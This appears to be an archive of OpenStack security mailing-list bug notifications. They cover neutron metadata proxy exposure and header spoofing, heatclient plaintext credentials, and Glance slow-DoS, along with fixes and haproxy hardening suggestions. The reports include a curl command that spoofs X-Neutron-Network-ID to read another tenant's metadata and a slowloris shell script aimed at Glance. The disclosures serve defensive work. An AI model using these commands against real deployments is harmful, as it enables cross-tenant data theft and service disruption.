# Setup: OpenStack Newton with `force_metadata = true` on all network nodes Kubernetes Gardener setup (seed+shoot) on OpenStack # Detail description from the hacker simulation: By running a nmap -sn … scan (ping scan) we discovered several endpoints in the shoot network (apart from the nodes that can be seen from `kubectl --kubeconfig myshoot.kubeconfig get nodes`). We noticed that some of the endpoints also serve meta and user data on port 80, i.e. the metadata service is not only available from the well-known metadata service IP (http://169.254.169.254/…, https://docs.openstack.org/nova/latest/user/metadata-service.html) but also from those other addresses. In our test the endpoints were 10.250.0.2-7. We learned that the endpoints probably are the OpenStack DHCP nodes, i.e. every OpenStack DHCP endpoint appears to also serve the metadata. While the accessibility of the metadata service is a known problem, this situation is “worse” (compared to e.g. Gardener seed and shoot clusters on AWS) for the following reasons: 1. If a network policy is applied to block access from cluster payloads to the metadata service, it’s not enough to block well-known `169.254.169.254` but it must also block all access to all other existing endpoints. How can the definite set of endpoints be determined? Are they guaranteed to not change during the lifetime of a cluster? 2. If the metadata service is only accessible via 169.254.169.254, the known `kubectl proxy` issue (details can be shared if needed) cannot be used to get access to the metadata service, as the link-local 169.254.0.0/16 address range is not allowed by the Kubernetes API server as an endpoint address. But for example 10.250… is allowed, i.e. a shoot user on OpenStack can use the attack to get access to the metadata service in the seed network. The fact that no fix is in sight for the `kubectl proxy` issue and it might not be patchable poses an additional risk regarding 2. We will try to follow up on that with the Kubernetes security team once again. # Detail information: Due to the “force_metadata” setting the DHCP namespaces are exposing the metadata service: # ip netns exec qdhcp-54ad9fe0-2ce5-4083-a32b-ca744e806d1f netstat -tulpen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 0 1934832519 54198/python tcp 0 0 10.222.0.3:53 0.0.0.0:* LISTEN 0 1934920972 54135/dnsmasq tcp 0 0 169.254.169.254:53 0.0.0.0:* LISTEN 0 1934920970 54135/dnsmasq tcp 0 0 fe80::f816:3eff:fe01:53 :::* LISTEN 198 1934909191 54135/dnsmasq udp 0 0 10.222.0.3:53 0.0.0.0:* 0 1934920971 54135/dnsmasq udp 0 0 169.254.169.254:53 0.0.0.0:* 0 1934920969 54135/dnsmasq udp 0 0 0.0.0.0:67 0.0.0.0:* 0 1934920966 54135/dnsmasq udp 0 0 fe80::f816:3eff:fe01:53 :::* 198 1934909190 54135/dnsmasq The problem is that the metadata proxy is listening to 0.0.0.0:80 instead of 169.254.169.254:80. This lets the metadata service respond on DHCP IP addresses as well, which cannot easily be blocked.
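The binding can be verified directly on a network node with a check along these lines (a sketch; the namespace name follows the qdhcp-<network-id> pattern shown above, and ss from iproute2 stands in for netstat):

    # list TCP listeners inside the DHCP namespace; a metadata proxy bound to
    # 0.0.0.0:80 rather than 169.254.169.254:80 exhibits the problem
    ip netns exec qdhcp-<network-id> ss -tlnp | grep ':80 '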
This fix mitigated the problem: --- neutron.org/agent/metadata/namespace_proxy.py 2018-08-31 12:42:25.901681939 +0000 +++ neutron/agent/metadata/namespace_proxy.py 2018-08-31 12:43:17.541826180 +0000 @@ -130,7 +130,7 @@              self.router_id)          proxy = wsgi.Server('neutron-network-metadata-proxy',                              num_threads=self.proxy_threads) - proxy.start(handler, self.port) + proxy.start(handler, self.port, '169.254.169.254')          # Drop privileges after port bind          super(ProxyDaemon, self).run() To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1790706/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:12:58 2020 From: 1865036 at bugs.launchpad.net (Daniel Alvarez) Date: Fri, 28 Feb 2020 14:12:58 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289917906.12734.14510163631525171316.malone@wampee.canonical.com> I think this won't apply to ML2/OVN as metadata is always fetched via static route to the metadata port and not through a router, so that traffic will never exit the logical switch (Neutron network) to another metadata proxy. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is that one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected...
but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:48:35 2020 From: 1865036 at bugs.launchpad.net (Brian Haley) Date: Fri, 28 Feb 2020 14:48:35 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290131679.26618.6611331014098608872.launchpad@gac.canonical.com> ** Changed in: neutron Importance: Undecided => High -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is that one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected...
but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:48:49 2020 From: 1865036 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 14:48:49 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290132962.11976.16542312497502745151.malone@soybean.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/710458 ** Changed in: neutron Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is that one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected...
but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:46:53 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:46:53 -0000 Subject: [Openstack-security] [Bug 1408530] Re: heat CLI is passing raw username and password for stack-create stack-update and stack-preview References: <20150108024125.4891.64572.malonedeb@chaenomeles.canonical.com> Message-ID: <158290121439.26961.6628657192867153538.launchpad@gac.canonical.com> ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1408530 Title: heat CLI is passing raw username and password for stack-create stack-update and stack-preview Status in python-heatclient: Triaged Bug description: When using the CLI or the heatclient directly for every call to stack.create, stack.preview or stack.update the username and password are being transmitted in plaintext to heat as the X-Auth-User and X-Auth-Key headers. This would seem like a hangover from before trusts being available and heat wanting to authenticate as the current user. This behaviour ignores the --include-password cli flag. To manage notifications about this bug go to: https://bugs.launchpad.net/python-heatclient/+bug/1408530/+subscriptions From fungi at yuggoth.org Fri Feb 28 15:32:17 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 15:32:17 -0000 Subject: [Openstack-security] [Bug 1572966] Re: Glance is vulnerable to 'slow DOS' attacks References: <20160421110623.5722.62560.malonedeb@chaenomeles.canonical.com> Message-ID: <158290393846.11731.6868849886277313339.launchpad@wampee.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Glance is vulnerable to 'slow POST'/'slowloris'/slow read style attacks. 
You can use a script such as this:  #!/bin/sh  echo "POST /v2/images HTTP/1.1"  echo "Host: 192.168.1.101:9292"  echo "Accept-Encoding: gzip, deflate"  echo "X-Auth-Token: 4c70f52ea77b40e2ae42ccd0ac868e1d"  echo "Content-Type: application/json"  echo "Content-Length: 1000000000000000"  echo  while true  do    sleep 1    echo -n "X"  done to hold a connection open to Glance indefinitely ($ bash script.sh | telnet localhost 9292). You can also do similar things sending bogus headers indefinitely/doing slow reads etc. (There's a good blog post here https://blogs.akamai.com/2013/09/slow-dos-on-the-rise.html) A couple of points: 1. This isn't specific to Glance 2. I'm not convinced that Glance code is the place to address this 3. I'm motivated to log this in part due to the proposed new 'max_upload_time' parameter: https://review.openstack.org/#/c/270980/9/glance/api/v2/info.py I'd like to discuss the max_upload_time parameter without being accused of openly discussing DOS opportunities (even if they are fairly obvious ones) ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1572966 Title: Glance is vulnerable to 'slow DOS' attacks Status in Glance: Opinion Status in OpenStack Compute (nova): Opinion Status in OpenStack Security Advisory: Opinion Bug description: Glance is vulnerable to 'slow POST'/'slowloris'/slow read style attacks. You can use a script such as this:  #!/bin/sh  echo "POST /v2/images HTTP/1.1"  echo "Host: 192.168.1.101:9292"  echo "Accept-Encoding: gzip, deflate"  echo "X-Auth-Token: 4c70f52ea77b40e2ae42ccd0ac868e1d"  echo "Content-Type: application/json"  echo "Content-Length: 1000000000000000"  echo  while true  do    sleep 1    echo -n "X"  done to hold a connection open to Glance indefinitely ($ bash script.sh | telnet localhost 9292). You can also do similar things sending bogus headers indefinitely/doing slow reads etc. (There's a good blog post here https://blogs.akamai.com/2013/09/slow-dos-on-the-rise.html) A couple of points: 1. This isn't specific to Glance 2. I'm not convinced that Glance code is the place to address this 3. I'm motivated to log this in part due to the proposed new 'max_upload_time' parameter: https://review.openstack.org/#/c/270980/9/glance/api/v2/info.py I'd like to discuss the max_upload_time parameter without being accused of openly discussing DOS opportunities (even if they are fairly obvious ones) To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1572966/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 16:41:59 2020 From: 1865036 at bugs.launchpad.net (Radosław Piliszek) Date: Fri, 28 Feb 2020 16:41:59 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290811976.26040.12751434921951425692.malone@gac.canonical.com> @Daniel - yeah, I confirmed that in comment #7. @Brian - ack, agreed. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is that one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions
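To illustrate point 1 of the code analysis above: the generated haproxy configuration could scrub any client-supplied identity headers before adding the one the proxy itself vouches for, roughly as follows (a sketch only — del-header and set-header are standard haproxy directives, but this layout is an assumption modeled on the driver.py template linked above, and the authoritative change is the one proposed in https://review.opendev.org/710458):

    listen listener
        bind 0.0.0.0:9697
        # never trust X-Neutron-* headers arriving from the instance side:
        # delete both variants, then set only the value this proxy knows
        http-request del-header X-Neutron-Network-ID
        http-request del-header X-Neutron-Router-ID
        http-request set-header X-Neutron-Router-ID ROUTER_ID_PLACEHOLDER
        server metadata unix@/var/lib/neutron/metadata_proxy

Note that set-header already removes any existing occurrences of the header it sets; deleting the opposite-type header explicitly mirrors the behaviour described in the comments above, where a proxy expecting a network ID drops any router ID header and vice-versa.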